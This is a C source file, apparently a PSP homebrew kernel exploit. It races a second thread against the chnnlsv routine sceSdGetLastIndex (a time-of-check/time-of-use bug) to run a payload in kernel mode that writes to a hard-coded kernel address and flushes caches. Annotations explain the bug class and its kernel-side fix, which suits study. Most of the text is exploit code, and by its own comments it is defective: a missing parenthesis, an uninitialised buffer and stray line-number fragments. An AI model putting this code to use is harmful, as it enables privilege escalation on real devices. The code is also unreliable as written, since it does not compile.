sceSdGetLastIndex

// TOCTOU (time-of-check / time-of-use) kernel exploit against chnnlsv, as pasted.
// The bug class: a kernel routine reads a user-supplied structure more than once
// and a second user thread changes it between the check and the use. The
// defensive fix on the kernel side is to copy such structures once and validate
// only the private copy.

// Shared flag: set to 1 by KernelFunction() once it runs, polled by both loops
// in do_exploit(). It is neither volatile nor atomic, so a compiler may legally
// hoist the read out of the polling loops; the pasted code relies on it not doing so.
int is_exploited;
// Absolute kernel address that KernelFunction() stores into via _sw(). Not derived
// from anything on this page — presumably firmware-specific (TODO confirm).
u32 address = 0x8800F71C;
  5.  
/*
 * Payload the author intends to run in kernel mode (its address, with the high
 * bit set, is passed to _sceKernelLibcTime in do_exploit()).
 *
 * Steps, exactly as visible here:
 *   1. set the shared flag so the user-mode polling loops terminate;
 *   2. store one word at `address` through _sw() (a helper not defined on this
 *      page; presumably a raw store-word primitive — TODO confirm);
 *   3. call two routines at hard-coded addresses that the author names as the
 *      kernel's dcache-writeback/invalidate and icache-invalidate entry points,
 *      so the modified memory is re-read by the instruction fetcher.
 *
 * All three absolute addresses (the store target, the two function pointers)
 * are literals that only match the firmware they were taken from.
 * Always returns 0; nothing on this page reads the return value.
 */
int KernelFunction()
{
    is_exploited = 1;

    _sw(0x8C654384, address);

    void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
    void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;

    _sceKernelDcacheWritebackInvalidateAll();
    _sceKernelIcacheInvalidateAll();

    return 0;
}
  20.  
/*
 * Drives the race. Two threads share the stack buffer `packet`:
 *   - the main loop writes packet[9] = 16 and hands `packet` (plus two
 *     offsets into it) to sceSdGetLastIndex, resolved from the chnnlsv
 *     import table;
 *   - `store_thread` keeps overwriting packet[9] with a pointer-derived
 *     value while the kernel call is in flight.
 * If the kernel routine validates packet[9] and then re-reads it, the second
 * read can see the other thread's value: that is the time-of-check /
 * time-of-use window named in the file header. A kernel that copies the
 * structure to its own memory before validating it closes this window.
 *
 * Notes for a reader:
 *   - `packet` is never initialised; the kernel call receives whatever was on
 *     the stack.
 *   - `store_thread` is a GCC nested function (non-standard C); taking its
 *     address makes GCC emit a trampoline on the stack, which in turn needs an
 *     executable stack.
 *   - The _sceKernelLibcTime declarator on the second FindImport line is
 *     missing a closing parenthesis, so this file does not compile verbatim.
 *   - `(u32)&packet` and `(u32)packet` denote the same address for an array.
 *   - p5_open_savedata / p5_close_savedata and FindImport are taken from HBL
 *     per the author's comments and are not defined on this page.
 */
void do_exploit()
{
    is_exploited = 0;
    u32 packet[256];

    //taken from HBL
    p5_open_savedata(PSP_UTILITY_SAVEDATA_AUTOLOAD);

    //search for this function in volatile ram
    // Third argument 1/0 to FindImport presumably selects which RAM region is
    // searched, per the author's two comments — TODO confirm against HBL.
    int (* _sceSdGetLastIndex)(u32 a0, u32 a1, u32 a2) = (void *)FindImport("sceChnnlsv", 0xC4C494F8, 1);

    //search for this function in main ram
    int (* _sceKernelLibcTime(u32 a0, u32 a1) = (void *)FindImport("UtilsForUser", 0x27CC57F0, 0);

    // Racing thread: rewrites packet[9] until KernelFunction() flips the flag.
    // sceKernelDelayThread(0) yields so the main loop gets scheduled in between.
    int store_thread()
    {
        while (is_exploited != 1) {
            packet[9] = address - 18 - (u32)&packet;
            sceKernelDelayThread(0);
        }

        sceKernelExitThread(0);

        return 0;
    }

    // Priority 8, 512-byte stack, user attributes; return values of the
    // create/start calls are not checked.
    SceUID storethread = sceKernelCreateThread("store thread", store_thread, 8, 512, THREAD_ATTR_USER, NULL);
    sceKernelStartThread(storethread, 0, NULL);

    // Main loop: present the "checked" value, call into the kernel, then call
    // the time function with KernelFunction's address OR'd with 0x80000000
    // (the author's way of forming a kernel-space pointer — TODO confirm).
    while (is_exploited != 1) {
        packet[9] = 16;
        _sceSdGetLastIndex(packet, (u32)packet + 40, (u32)packet + 56);
        sceKernelDelayThread(0);
        _sceKernelLibcTime(0, (u32)&KernelFunction | (u32)0x80000000);
        sceKernelDcacheWritebackAll();
    }

    //taken from HBL
    p5_close_savedata();

    // The racing thread exits itself once the flag is set; this only reclaims it.
    sceKernelDeleteThread(storethread);
}
  63.  
// Entry point, placed in the .text.start section by the attribute on this
// forward declaration (the attribute is on the declaration, not the definition).
void _start __attribute__ ((section(".text.start")));
// Runs the race once and then asks the kernel to exit the game; no exit status
// is returned, and do_exploit() reports nothing about whether it succeeded.
void _start()
{
    do_exploit();
    sceKernelExitGame();
}